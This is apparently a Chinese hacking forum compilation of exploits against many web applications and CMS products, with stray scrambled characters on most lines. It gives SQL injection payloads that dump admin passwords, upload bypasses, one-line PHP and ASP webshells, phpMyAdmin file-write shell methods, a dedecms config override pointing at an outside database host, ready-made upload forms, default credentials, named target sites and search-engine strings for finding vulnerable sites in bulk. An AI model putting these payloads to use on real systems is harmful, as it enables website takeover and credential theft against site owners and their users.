启航企业建站系统 cookie注入漏洞通杀所有版本+ z. s6 q! j- }+ {' @. D
" T6 k5 l3 g/ `' R直接上exploit:
+ h' v) ^- ~) A0 @: h8 Tjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));5 `7 h6 ~' z9 W) G$ v8 k2 b6 O
test:http://www.tb11.net/system/xitong/shownews.asp?id=2103 }; i0 p' \5 Y& X
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- q$ e6 m0 S4 k1 \4 q- ]$ K- ~
Asprain论坛 注册用户 上传图片就可拿到webshell7 u/ g4 }$ f" p* d4 T+ @
+ ]: E& F/ L$ b- W4 ]/ l# TAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。5 R5 m% v! t6 p5 G5 T1 O( |4 V! x
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>3 a4 J: S: P9 ]9 ?: T2 p
2.gif 为一小图片文件,一定要小,比如qq表情图片
+ h% \6 d. ^5 H4 G) p: T z- G3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
! Z& h2 G3 c8 z6 v: K7 Y/ a; X4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
$ v! Z; } g; R( s2 d5.q.asp;.gif; ?' l( W q/ n; ^8 ` L* B( d
google:Powered by Asprain
7 H$ `( I3 H7 e( y* W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 ~7 d8 n# A$ B0 K8 N
6 `! {) I& k& n6 E) Q& XShopNum1全部系统存在上传漏洞。2 v8 t8 T$ y/ j5 D) i0 M+ v: g
. N G \ V3 z2 _
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。7 y' b( a @" n; K
按说明 提示登录后台。。% y6 ]2 U& w; Y
在后台功能页面->附件管理->附件列表# _8 g0 }+ C( N5 v7 `) r+ O6 n
可以直接上传.aspx 后缀木马
2 F8 }1 Z$ s/ P- A0 Uhttp://demo.shopnum1.com/upload/20110720083822500.aspx! c) h/ D& m4 o7 o6 n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" {: F2 K8 z Q4 t: x3 K, `6 F
2 J: k: u( G+ z* ~# E e牛牛CMS中小企业网站管理系统 上传漏洞
5 p3 ~- c9 |4 G
+ _# p9 N% {( m2 B* A牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
. L2 \" L+ k: U7 H后台:admin/login.asp6 @/ E0 k3 \% a2 z: l3 @4 n9 a. w
ewebeditor 5.5 Nday
" P, C5 b$ s; T+ d7 {+ D8 U" wexp:/ `- y3 r3 z" b
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?3 g9 w3 O* C, G
<input?type=file?name=uploadfile?size=100><br><br>?
4 c) h# w, P4 c3 Q" h6 Q<input?type=submit?value=upload>?/ G# V/ z8 F% _- V G( m1 K) o4 W
</form>
4 O V$ f$ w- U9 Y- g+ q1 ops:先上传小马. W& ]& M. Z3 ^
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
* J6 Y. A4 c, ]3 U$ Y1 n8 h ~, ~2 w8 u2 Z [) F3 y H( G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 R) ]8 z4 `4 V1 f" j+ z. c2 j _6 R4 d! @0 I
YothCMS 遍历目录漏洞
& r8 K; w- ?/ e6 H# u% O
7 m' X: V! F& G" ]- @& l$ X优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。) p2 { [# `8 k# S$ }: a
默认后台:admin/login.asp
2 _2 {7 @+ ~9 n遍历目录:) J9 q" K6 X' z6 [' O& {4 c
ewebeditor/manage/upload.asp?id=1&dir=../
& {# @, \' g/ t8 Y& Z( Ydata:. ?$ y( ~$ z R% g$ T
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
' v& V7 q) i' S: [* \) R3 w' V, |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' _" e$ ` O+ j+ Y' T6 I! b) ~8 } j7 v
Net112企业建站系统 1.0
! y7 ]+ s6 H* ]; ?4 `0 f! ?1 l4 S6 P
; `; g! ]+ A1 q- H& u源码简介:# z9 g! W! ^' K% L6 H
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
8 }$ u7 [- h5 m8 l添加管理员:
; Q* `) l6 A6 _http://www.0855.tv/admin/admin.asp?action=add&level=2
( t% B4 r9 ?9 F) Z其实加不加都不是很重要,后台文件都没怎么作验证。( A! u) D. q& t0 z0 P
上传路径:( C" N; H+ c/ H) Z% e1 I) d9 N
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200( P6 \* `( \6 b9 t( Y. @/ A
http://www.0855.tv/inc/Upfile.asp?Stype=2
) u; V9 i {' K1 m怎么利用自己研究。2 e. \ z5 k* q+ }, G
遍历目录:" k. @/ ~" |" B$ r0 }' L0 \
http://www.0855.tv/admin/upfile.asp?path=../..3 T4 ^4 u! |0 Z" Z1 ]6 ^ L2 g' \! t
如:
0 v V' B% m* t6 @9 {: `/ X4 ^: `http://www.0855.tv/admin/upfile.asp?path=../admin* ]1 H6 y" Y p1 l5 X, i4 S
http://www.0855.tv/admin/upfile.asp?path=../data
- s9 D& D* s; A& l6 p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 t9 u7 s# C' u& |! n
+ U; c# l1 E1 Z2 Q
易和阳光购物商城通杀 上传漏洞0 x& y8 o! I8 G/ c L2 l, i0 o- p
: @& `$ |3 I. P; B
前提要求是IIS6.0+asp坏境。
9 c: j* E y4 a7 S- K漏洞文件Iheeo_upfile.asp % \- z- O( k( U+ S$ f7 \
过滤不严.直接可以iis6.0上传/ w/ `3 M$ N. o& d1 h$ f1 W
把ASP木马改成0855.asp;1.gif- ]- Z# R; `! ?$ \0 p
直接放到明小子上传8 X) u7 ]2 e- f
Google搜索:inurl:product.asp?Iheeoid=
8 L: i; S2 o0 ~9 K, _4 V$ B% e3 X# U. o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 Y/ M- p3 G+ y/ {/ V! i- Y8 u4 {0 e& x( X$ D( O. k4 W4 P# E
phpmyadmin后台4种拿shell方法
' N z8 P" D6 M4 G' s) k& E3 x+ h$ k u$ I( A
方法一:
6 L0 ~' h9 l2 q% Z% [' ?CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );% i( f! `7 m, B8 I
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');& X4 B e: E7 w5 `; X R
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';6 b2 c+ e- X6 Y" C* w/ C. w' J
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
2 X6 g: J Q) G, _" x; ~一句话连接密码:xiaoma
7 d0 e) y" o/ t2 ^2 s# [. p7 J0 v方法二:
4 S' X; r. j: D1 G& nCreate TABLE xiaoma (xiaoma1 text NOT NULL);
. X$ x- L/ E4 \5 C1 l5 B$ F$ ^- ?, \, KInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
5 R( `, L& h3 k+ j0 r4 {& B3 _select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
1 v+ L8 i% q& y1 M1 u5 {Drop TABLE IF EXISTS xiaoma;6 z4 Q4 j( U" V) _! N( Y3 T
方法三:
5 N1 o6 @1 b: }. K& Y0 d# g: x读取文件内容: select load_file('E:/xamp/www/s.php');) w1 v) m) N8 k7 O- ], A
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'/ I- A% n# d8 S7 C7 u
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'% J+ d/ n+ k, j5 F$ G7 \
方法四:, @6 P _1 {2 Y4 i& O. @
select load_file('E:/xamp/www/xiaoma.php');
; y' P* ^( y8 tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'5 A3 i; s T& a$ z- x4 a; }9 s
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir8 d" O4 g4 I7 v/ Z; A$ Z9 }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ G) ^. H1 |: H& B
* V4 Q7 l) |/ X, b传信网络独立开发网站源码0day漏洞
- V* w, z3 b6 }* r
* c4 s" t' F& @* B" B/ }后台system/login.asp
- X1 h# v8 D* i. E# V进了后台有个ewebeditor/ z: Y. L n- @. C- z# L8 x2 E
Google 搜索inurl:product1.asp?tyc=
& q; f, V6 q- t# n. p' p4 F编辑器漏洞默认后台ubbcode/admin_login.asp9 {: Y# T1 D) J. e7 I
数据库ubbcode/db/ewebeditor.mdb/ ?# v* K5 y/ P9 L7 M" [
默认账号密码yzm 1111119 X) a3 f0 @! n( j. c1 Y: b% E; P
. f: G3 [1 K% `( \$ w& ?: j0 k
拿webshell方法
2 l/ G% r" N1 G% D7 C' d+ m6 S登陆后台点击“样式管理”-选择新增样式 . E' j. C% i! W! P: y0 i2 ?
样式名称:scriptkiddies 随便写
( f) ~1 d: d; ? S# C& @; L路径模式:选择绝对路径
; H$ m/ @. q/ k. h! Q& @5 M图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx8 v$ c" i0 l; _ g4 c
图片类型比如就是我们要上传的ASP木马格式: M3 r' o+ G) W, M( P1 {
上传路径:/" o ~6 v" Y5 w' _
图片限制:写上1000 免的上不了我们的asp木马
6 w C" h% [2 r1 Q/ m上传内容不要写3 O6 n8 f! K. ?( V G
可以提交了 $ u( u! `8 W: p {3 Q; g+ n
样式增加成功! 1 x) J3 w" B; a) E! C) i& u' p( A
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
: K+ d- M8 C( v1 |! C, ]7 _按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置, e+ _9 D( o0 ?
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
( ]' r& ]4 \. d8 \3 u" A上ASP木马 回车 等到路径
p! C+ K; W1 z7 {$ n U' n
7 ]/ J" I' G8 Q5 w后台:system/login.asp- k- Z5 i- @& p# }- r
Exp:" n3 a/ p# _8 L+ G
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master/ W; u4 L/ b- | t2 M
测试:4 C8 ~1 t% x# i$ O1 \( O0 k
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: V% I+ U7 c, F( f) i$ _* ]% Rhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
4 g+ u% R: Z& I5 e/ V" A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ q0 [/ Y0 N: x8 I h
$ l7 _) b, t2 \* q2 |foosun 0day 最新注入漏洞# |; u7 u$ [; j! [7 k f
$ T) m* w* S% W5 J$ ~ ^/ g3 O
漏洞文件:www.xxx.com/user/SetNextOptions.asp; k& f; S! t6 B
利用简单的方法:
p" `( b4 z$ {( V1 P* s4 o暴管理员帐号:
S3 y. {; D( c# j+ @: z' Lhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
9 y9 I# a m( `2 \+ s/ ?; j暴管理员密码:
2 U l0 X- o" V o4 Fhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,3 O" F& q. t! U, r6 n5 H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ W8 s* q) ~' \3 k8 j3 m U7 {0 t0 k* i/ I+ ^3 z2 s
网站程序的版权未知!/ Q; u( H% H8 r- C/ f6 ?# e5 j( f) {
# |! j4 | }# X2 ~2 {
默认网站数据库:$ b8 K d0 u6 `, u5 L
www.i0day.com/data/nxnews.mdb. \5 M8 ~ J' a4 F( H ]
ewebeditor 在线编辑器:/ o% r, H' M8 q# O1 b
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb. c& k8 g; w: W% l* ?) A
登录地址:ewebeditor/admin_login.asp
$ l' t* J9 P+ j/ v( ]$ W默认密码:admin admin/ B& O# @ U/ M R
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data& p0 A+ f* b* e# F ~
0 G# t8 ?8 q1 e" v9 D
Sql注入漏洞:
6 X- ?; f( @! \http://www.i0day.com/detail.asp?id=125 D, `7 p5 b& Z; `
exp:
- y$ x9 R* W, [8 L+ }" lunion select 1,admin,password,4,5,6,7,8 from admin
, f, N" b8 V: ~6 D( c爆出明文帐号/密码
" Q: z0 ^* V! _: F, J8 n" Z
% @- V, c* ]. n; t" ]" ]上传漏洞:
, b4 f, P" O& [- D7 B后台+upfile.asp
+ w6 ~; a9 _1 f5 u# R! u如:5 ~+ j* J7 t7 | |5 R# ~, ~& k
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
6 f3 d5 e a: Q/ _, Pshell的地址:网址+后台+成功上传的马4 h( u- A& @: Q
google:inurl:news.asp?lanmuName=
& Z+ @& u4 S! f {# P! M6 y------------------------------------------------------------------------------------------------------------------------------------------------------------------------" \3 [. Y# y+ _7 ~$ r8 G' I- N$ w
/ O; K& E- W: _
dedecms最新0day利用不进后台直接拿WEBSHELL, f3 a1 X8 w! h
. U5 x" b) [8 z% v
拿webshell的方法如下:3 Q: W% p, c1 B) \) f
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
4 |5 b# Z" w- q# d( c前题条件,必须准备好自己的dede数据库,然后插入数据:$ Z$ t4 Y' Q4 _6 R2 y
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
3 V, M V' \' ]( B* C0 W3 {
* M: Y2 \) s( c4 u$ S7 M再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。# A7 R3 B& E: b
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">" ^2 m _' j0 o2 b, G4 k
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />1 B* G& {) {' y: I- b
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />7 q _$ G5 w' W
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' v/ S/ ]! X9 m9 O* w& j# f
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" k- O/ j; P2 s( d' ]$ U C<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />; P8 [$ Q0 \/ P, ^; m
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />+ b! H4 K1 L! b y$ @+ E
<input type="text" value="true" name="nocache" style="width:400">
# D, H+ q1 f! H2 l<input type="submit" value="提交" name="QuickSearchBtn"><br />" N& N, D2 z9 P* k
</form>6 b2 Y2 r0 i0 c* J3 \5 a) D
<script>
7 q; [( \- M7 S4 T' u: K+ m' q7 Ofunction addaction()
, N4 P; \) l3 E1 Y{
8 Y6 `5 X7 L6 R* D7 Z* }1 {document.QuickSearch.action=document.QuickSearch.doaction.value;4 h% O1 I8 w! ^6 Y5 H' G/ c' p) w
}) \& S" N4 ~/ n( O9 g/ ~7 R
</script>, \) J# L T& x: y" k
-----------------------------------------------------------------------------------------------------------------------------------------------
. G+ S# \; f( K8 D! U" `& i, }- x6 Y% l! J3 m3 b" O( }, A
dedecms织梦暴最新严重0day漏洞6 q8 v' _8 y/ P1 L' E4 w6 V5 K
bug被利用步骤如下:/ \4 ]7 P8 U6 c% s
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
6 |& Q6 p. |- ~) S把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
, h- f# k7 Q5 S+ e( a-------------------------------------------------------------------------------------------------------------------------------------------0 X$ k/ w. n2 b2 d: h
$ D3 M) b7 V& M# _0 Q0 w4 X多多淘宝客程序上传漏洞 ) D% W7 b- C( M+ V
漏洞页面:
" }5 S c4 i- |2 d y8 C1 Ladmin\upload_pic.php
1 a5 z2 y, m% L( I2 \传送门:
3 a- U7 ^% i* F5 H) ]1 hhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
7 t% z1 W$ L( L; n3 M* T- CPS:copy张图片马 直接 xxx.php 上传抓包地址!( f- I: E g( @8 l& P. s
------------------------------------------------------------------------------------------------------------------------------------------------------4 S7 D6 ?0 _" I& Z! U
# ?7 p" w8 y E5 t无忧公司系统ASP专业版后台上传漏洞% a; d( h' ?' r1 \* {* M& M
漏洞文件 后台上传
9 K2 \& J- o4 ^9 y) b* ~admin/uploadPic.asp
8 k! p6 P1 g2 m7 ^4 h' h7 I+ M漏洞利用 这个漏洞好像是雷池的3 t+ Y7 C- d- d8 A1 y% m5 V
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=15 T: J9 C. S9 }" n4 Q5 _; p
等到的webshell路径:
" |- [) H7 t% @9 T0 D2 k/UploadFiles/scriptkiddies.asp;_2.gif
7 C+ }5 [ B6 G---------------------------------------------------------------------------------------------------------------------------------------------------# I6 g3 v6 a- [. F) i o
+ G4 F8 ^% H: w0 h( ]
住哪酒店分销联盟系统2010
1 Q. F- j, w3 `Search:8 `( `" L4 R z
inurl:index.php?m=hotelinfo L) C6 I. B6 V
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
, j! w& g# p3 {' @: `+ t3 s默认后台:index.php?m=admin/login
; M8 Q9 ^' L9 J--------------------------------------------------------------------------------------------------------------------------------------------------/ G$ l, ?. L- x/ w
& x" x N$ }' j7 q( T- k. G; ?inurl:info_Print.asp?ArticleID=
1 A9 Y' b2 }# d3 {3 [后台 ad_login.asp" o0 x |" _2 t
爆管理员密码:
q7 c+ B: D/ m# m& }$ K E0 Sunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin- ]8 K( [' d% I* B0 o
------------------------------------------------------------------------------------------------------------------------------------------------------------3 [. z* B- _8 K% O/ W& n
" K2 }0 W8 }9 D% V
搜索框漏洞!
: Q7 y) A8 U% L. `0 x%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
$ R( k D C. D g' H0 ?--------------------------------------------------------------------------------------------------------------------------------------------------------/ k1 v6 q6 Y/ Q
1 ?" H; S1 @( g% t) O% G/ Q, U; U关键字:
( R+ u- O$ T$ ]- l* X# Winurl:/reg_TemletSel.asp?step=2
0 D1 v2 o1 V1 e a9 B8 _/ k或者
# u6 `( F: F9 g! Z/ J8 Q电子商务自助建站--您理想的助手+ \$ V5 s0 p* w. h$ C
-------------------------------------------------------------------------------------------------------------------------------------------------* k P% h' ~; v7 Z9 D
4 f6 s/ ?- @$ e- tiGiveTest 2.1.0注入漏洞
1 ?) N2 V: \2 _3 H& J) PVersion: <= 2.1.03 ^2 Z+ `& U9 U# p- a( { m4 _/ s6 x
# Homepage: http://iGiveTest.com/
6 x$ z7 P4 @% }4 n9 r& [" t谷歌关键字: “Powered by iGiveTest”; o" G( k5 N H- [* w, i+ b2 v; q
随便注册一个帐号。然后暴管理员帐号和密码" @; ^" a+ Q, F' d: x, B- I' m
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
+ \5 Q& c7 ]) M$ F e$ ^/ t------------------------------------------------------------------------------------------------------------------------------------------------
# T1 q1 e; U6 @6 x
9 e4 @' c& v% K. V$ Q6 O+ ICKXP网上书店注入漏洞3 O) }: M# \9 w' Y! X, l+ G M; e
工具加表:shop_admin 加字段:admin
* {/ C( h- V' u7 _2 Z后台:admin/login.asp
: m# ~: _0 W0 B/ l. w' W' [' P登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
9 u2 }7 A- A3 b8 o) k- Hinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, [1 |$ Q# F# j1 e% }4 N1 y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 v' p( q" z( O F
9 o) K7 r/ [! X6 e段富超个人网站系统留言本写马漏洞+ ], g0 ~+ }+ O; {. ^$ h
源码下载:http://www.mycodes.net/24/2149.htm
; K& C7 L* g: x' H6 S2 b$ qaddgbook.asp 提交一句话。
+ x" T6 u% }( |, ^连接: http://www.xxxx.tv/date/date3f.asp+ K$ s& V' c) f) @
google:为防批量,特略!: J1 \) o7 `- _( n2 C) C% W) q8 F# e; q
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 W1 m$ f' b9 J/ ?3 m: S
; z( b" j- n$ E3 B智有道专业旅游系统v1.0 注入及列目录漏洞
3 r2 _- z3 F) d& I默认后台路径:/admin/login.asp
$ F+ i% w) h+ p' A( o默认管理员:admin1 d- q/ L' V7 I. _7 ]0 ^, d
默认密码:123456. d8 F ] ^ c
SQL EXP Tset:
, h( Z. c* X" ]http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin u* C9 @+ S e( ^; {/ V' n8 p
------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ n" ~2 @( B, | A# q0 i' t' O
1 n& h p& M" S ~4 S. B6 f
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
- ]2 C5 R. I# K! j* BEXP:
" u, m, B4 x! L4 ]! l3 y<title>eWebeditoR3.8 for php任意文件上EXP</title>
! g7 M8 q3 @6 J: H6 ]# {. P! O) `# S<form action="" method=post enctype="multip
7 U' C0 F* z8 r& ^6 W0 dart/form-data"> ; y& E8 P: S: V6 @7 j+ @. K; {
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 5 C& j8 ~4 W" Z4 x. N
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
/ s& F9 e [7 S" v: s% H<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> , Q. i: O4 X+ ]) w
file:<input type=file name="uploadfile"><br>
' E* b& G1 }( p, c<input type=button value=submit onclick=fsubmit()> 8 p4 M- X) o8 s l
</form><br> 9 a' c. m' z. m6 M# o
<script>
# Z, U; \& \! bfunction fsubmit(){
# N0 \ g$ f/ q1 f# p& w% Q Cform = document.forms[0]; # }9 c1 p6 N4 G# ~' }
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; * ^4 B* A, I$ d
alert(form.action);
0 U/ H0 l/ ?) i1 v% Rform.submit(); + E: z4 y4 Y$ p t: z
} $ O& k1 _ \3 u$ W
</script>
5 w5 \0 q4 d/ o: ^, f注意修改里面ewebeditor的名称还有路径。
& j' }1 M0 K+ v* Y- t! h1 u---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# o; g* ^( A& ? B: y$ F% P- I& V
- N( a8 [: D5 [' c! F$ R: J4 t
提交’时提示ip被记录 防注入系统的利用
+ |9 f! w7 `7 i1 Z* W网址:http://www.xxx.com/newslist.asp?id=122′
, N* S6 I! ]. Y9 e& G提示“你的操作已被记录!”等信息。
& f. l) Z( H3 ]. u: {利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。& U+ `, g4 g$ y% [0 c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------) q/ ~" H! E8 A2 V7 j
- |5 c% y( o) H# w7 L西部商务网站管理系统 批量拿shell-0day
1 J( A7 F. `! e7 C3 u这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
* [- z% K+ c. Y. _/ n3 o! B) p0 |1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
5 K2 j0 U# z* U. ~" C; T: L2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合: w2 {' d; P6 y8 x o1 a# X c) _
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂: a/ Y( r( U% }
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Z4 @. q. M- a4 y5 ^$ e+ n, {3 q8 W( n q; A0 s' ]; p
JspRun!6.0 论坛管理后台注入漏洞
1 r4 l/ X& T. \( d
8 r! ?0 _. l: C! g, M HSEBUG-ID:20787 发布时间:2011-04-30 影响版本:, \7 n& }: o/ B
JspRun!6.0 @. i3 H) c0 E9 G
漏洞描述:4 _; R. _; ~7 F Y; g8 O5 l
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。, y _2 a' e* X* ?; M
在处理后台提交的文件中ForumManageAction.java第1940行
$ _" n$ Z& g/ `9 [$ _ k& K; lString export = request.getParameter("export");//直接获取,没有安全过滤+ i+ @- I- f2 E* J p
if(export!=null){" W2 E; |3 r* o/ }0 ]1 ^1 d
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...- B: @* ]* }1 @5 g$ o
if(styles==null||styles.size()==0){' f( `" N9 @: J9 P# _# X( _
<*参考# v) |7 F5 v8 r( k, b* b
nuanfan@gmail.com
/ M" [ W5 l+ j$ {6 X1 M*> SEBUG安全建议:( V9 C* Z# @( F
www.jsprun.net
2 Y- R( z- ]0 t! ](1)安全过滤变量export' b3 S8 d+ A2 L+ X( G D; ^
(2)在查询语句中使用占位符
{" d% A/ w# b7 Z, Z* _9 t------------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 z6 q% D( r* u/ q' V; m
* A1 q3 ?! P4 ?5 E& x乌邦图企业网站系统 cookies 注入
: y- }& p9 ] L2 [1 w
8 e# q7 C6 z, Q9 o& ]" k程序完整登陆后台:/admin/login.asp5 f/ T: m9 F* ^3 }
默认登陆帐号:admin 密码:admin888
: ?# u w8 C# M$ a语句:(前面加个空格)7 d6 h" w* V3 K" Q. B% v" d
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
5 A4 m1 }2 a8 G$ ^ {或者是16个字段:
y/ ]- r. k a# Z1 b& kand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin1 Y( V; E& H0 o# I9 H& v5 ]/ @" L
爆不出来自己猜字段。1 c! E3 V+ X. _% O! H+ E C
注入点:http://www.untnt.com/shownews.asp?=88
: W8 i" l0 o7 `, M* l+ ygetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp- y o" e+ X( j! K
关键字:
% c( q* v( R! Winurl:shownews?asp.id=) V- P1 g2 C8 o+ h1 I
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& f3 }: ^; v7 n1 h Z! p+ p" I( Q
& m, ~, _' t5 e4 @1 _* GCKXP网上书店注入漏洞& J6 H9 i# P+ C& p6 ?. _/ f( H
7 B8 Q. q( I5 z) L8 X
工具加表:shop_admin 加字段:admin; X% M5 ?# t$ v) o( P* r9 p
后台:admin/login.asp C0 J. Y/ s+ _! z' L6 k) y
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/" J8 }8 J7 _; Z
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息 |: R$ j: M. w) E" j. e
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 v6 `% a4 O* N1 |4 C' [* p# ]" P1 b4 R
YxShop易想购物商城4.7.1版本任意文件上传漏洞' t& J' A! r* U- g+ z4 t
1 X/ m7 x' X4 L% T" |1 nhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
1 O* @& M, i8 g0 _- X+ q+ \: [跳转到网站根目录上传任意文件。& o5 Q. N" T7 ?1 ]' E
